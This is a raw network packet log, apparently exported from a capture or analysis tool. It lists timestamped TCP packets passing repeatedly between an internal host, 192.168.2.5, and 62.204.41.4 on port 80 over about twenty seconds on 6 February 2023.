                                                        Feb 6, 2023 14:18:46.500541925 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.617605925 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.618278027 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.678077936 CET805012962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.678450108 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.680497885 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.680613041 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.681000948 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.743123055 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.745626926 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.747241020 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.852895975 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.854176998 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.915242910 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.915383101 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.915437937 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.915510893 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.931869984 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.993237019 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.996388912 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.996521950 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.102080107 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.103013992 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.163428068 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.163476944 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.163579941 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.163619995 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.164865017 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.225230932 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.230132103 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.230206013 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.352252960 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.353060961 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.412719965 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.412832022 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.415566921 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.415673971 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.416110039 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.478672981 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.481126070 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.481234074 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.585978985 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.586823940 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.647131920 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.647268057 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.648521900 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.648833990 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.648864031 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.709064960 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.712028027 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.712125063 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.821497917 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.821500063 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.881355047 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.881710052 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.881977081 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.882066965 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.882103920 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.941637993 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.944685936 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.945960999 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.055937052 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.056627035 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.116044044 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.116141081 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.117105961 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.117197990 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.120124102 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.180753946 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.184925079 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.184998035 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.298408985 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.299046993 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.359216928 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.359260082 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.359378099 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.359426975 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.518585920 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.596465111 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.596528053 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.596699953 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.752340078 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.755933046 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.814755917 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.816256046 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.816514969 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.816931963 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.816931963 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.879436970 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.882236004 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.882431984 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.004117966 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.004849911 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.065310001 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.065521955 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.066773891 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.071564913 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.109385967 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.169991016 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.174504995 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.174675941 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.694271088 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.694892883 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.754947901 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.755125999 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.755281925 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.755378962 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.757097960 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.817576885 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.820137978 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.820281029 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.997104883 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.997930050 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.058044910 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.058202028 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.058360100 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.058604002 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.069927931 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.130470037 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.136013031 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.136331081 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.849636078 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.849647045 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.910355091 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.910433054 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.911045074 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.911159992 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.911528111 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.972815037 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.975814104 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.975927114 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.392573118 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.398561954 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.454260111 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.454440117 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.460180998 CET805014362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.637896061 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.699395895 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.705470085 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.706880093 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.822626114 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.824182034 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884291887 CET805017362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.884337902 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.884469032 CET5017380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884519100 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.884943008 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:58.945087910 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.947803974 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:58.951764107 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.056782961 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.058641911 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.117338896 CET805017462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.117574930 CET5017480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.119364977 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.121509075 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.121879101 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.182511091 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.186496019 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.186649084 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.292296886 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.293025970 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.353344917 CET805017562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.353565931 CET5017580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.355142117 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.358557940 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.358931065 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.421020031 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.424455881 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.424662113 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.543790102 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.544636965 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.606141090 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.606178045 CET805017662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.606442928 CET5017680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.606628895 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.607120991 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.668508053 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.670885086 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.671051025 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.782175064 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.783659935 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843275070 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.843436956 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843719959 CET805017762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.843812943 CET5017780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.843879938 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:59.903326035 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.905893087 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:59.906096935 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.009356022 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.010201931 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.069901943 CET805017862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.069993973 CET5017880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.071516991 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.071633101 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.072206974 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.133519888 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.137847900 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.138003111 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.244137049 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.246793032 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.305661917 CET805017962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.305830002 CET5017980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.307992935 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.308157921 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.308509111 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.369777918 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.373677015 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.373883009 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.493810892 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.494616032 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.555352926 CET805018062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.555454969 CET5018080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.557210922 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.557301044 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.557837009 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.620642900 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.622848034 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.622910023 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.727744102 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.728379965 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.787766933 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.787888050 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.788880110 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.790395021 CET805018162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.790462971 CET5018180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.848211050 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.851037979 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:00.851135969 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.962735891 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:00.964380980 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.022269011 CET805018262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.023164034 CET5018280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.025810957 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.025927067 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.029659033 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.091197968 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.094944000 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.095067978 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.197139978 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.197870970 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.258229017 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.258395910 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.258553982 CET805018362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.258616924 CET5018380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.259062052 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.319324970 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.322190046 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.322340965 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.431324005 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.431972027 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.491750002 CET805018462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.491854906 CET5018480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.492134094 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.492218971 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.492595911 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.552925110 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.556504965 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.556687117 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.666157961 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.667057991 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.726747036 CET805018562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.726864100 CET5018580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.728457928 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.728600979 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.729093075 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.790524960 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.793245077 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.794925928 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.909929991 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.910618067 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.970979929 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.971352100 CET805018662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:01.971546888 CET5018680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.971976042 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:01.971976042 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.032232046 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.037403107 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.037612915 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.152431965 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.153033972 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.213015079 CET805018762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.214415073 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.214561939 CET5018780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.214620113 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.215107918 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.276766062 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.280091047 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.280469894 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.384443045 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.385456085 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.446165085 CET805018862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.446850061 CET5018880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.448035002 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.450968027 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.451596022 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.514158964 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.517589092 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.517777920 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.634754896 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.635955095 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.697396994 CET805018962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.697599888 CET5018980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.698159933 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.698277950 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.698642015 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.760833025 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.763273954 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.763459921 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.885102034 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.885946035 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.947280884 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.947319984 CET805019062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:02.947525024 CET5019080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.948024988 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:02.948024988 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.009222031 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.012465954 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.012581110 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.123766899 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.124630928 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.185605049 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.185645103 CET805019162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.185853004 CET5019180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.186394930 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.186395884 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.246762037 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.250641108 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.250869989 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.353341103 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.354250908 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.413883924 CET805019262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.413975954 CET5019280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.416862965 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.417015076 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.417591095 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.479909897 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.482860088 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.482960939 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.588080883 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.588968039 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.648308039 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.648437023 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.649008036 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.650507927 CET805019362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.650607109 CET5019380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.708261013 CET805019462.204.41.4192.168.2.5
